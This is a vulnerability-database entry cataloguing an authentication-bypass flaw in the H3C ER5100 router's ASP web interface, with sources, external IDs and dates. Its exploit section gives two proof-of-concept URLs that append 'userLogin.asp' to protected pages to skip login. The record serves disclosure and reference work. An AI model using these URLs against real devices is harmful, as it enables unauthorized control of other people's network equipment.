ID

VAR-E-201106-0424


EDB ID

35872


TITLE

H3C ER5100 - Authentication Bypass - ASP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35872

DESCRIPTION

H3C ER5100 - Authentication Bypass.. webapps exploit for ASP platform

Trust: 0.6

sources: EXPLOIT-DB: 35872

AFFECTED PRODUCTS

vendor:h3cmodel:er5100scope: - version: -

Trust: 1.0

vendor:3commodel:h3c er5100scope:eqversion:0

Trust: 0.3

sources: BID: 48384 // EXPLOIT-DB: 35872

EXPLOIT

source: https://www.securityfocus.com/bid/48384/info

The H3C ER5100 is prone to a remote authentication-bypass vulnerability.

Attackers can exploit this issue to bypass the authentication mechanism and perform unauthorized actions.

http://www.example.com:8080/home.asp?userLogin.asp
http://www.example.com:8080/wan_NAT.asp?userLogin.asp

Trust: 1.0

sources: EXPLOIT-DB: 35872

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35872

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35872

TYPE

Authentication Bypass

Trust: 1.0

sources: EXPLOIT-DB: 35872

CREDITS

128bit

Trust: 0.6

sources: EXPLOIT-DB: 35872

EXTERNAL IDS

db:BIDid:48384

Trust: 1.9

db:EXPLOIT-DBid:35872

Trust: 1.6

db:EDBNETid:57264

Trust: 0.6

db:WOOYUNid:WOOYUN-2010-02268

Trust: 0.3

sources: BID: 48384 // EXPLOIT-DB: 35872 // EDBNET: 57264

REFERENCES

url:https://www.securityfocus.com/bid/48384/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/35872/

Trust: 0.6

url:http://www.h3c.com.cn/products___technology/products/ip_network/router/er/er5100/

Trust: 0.3

url:http://www.wooyun.org/bugs/wooyun-2010-02268

Trust: 0.3

sources: BID: 48384 // EXPLOIT-DB: 35872 // EDBNET: 57264

SOURCES

db:BIDid:48384
db:EXPLOIT-DBid:35872
db:EDBNETid:57264

LAST UPDATE DATE

2022-07-27T09:59:08.141000+00:00


SOURCES UPDATE DATE

db:BIDid:48384date:2011-06-22T00:00:00

SOURCES RELEASE DATE

db:BIDid:48384date:2011-06-22T00:00:00
db:EXPLOIT-DBid:35872date:2011-06-22T00:00:00
db:EDBNETid:57264date:2011-06-22T00:00:00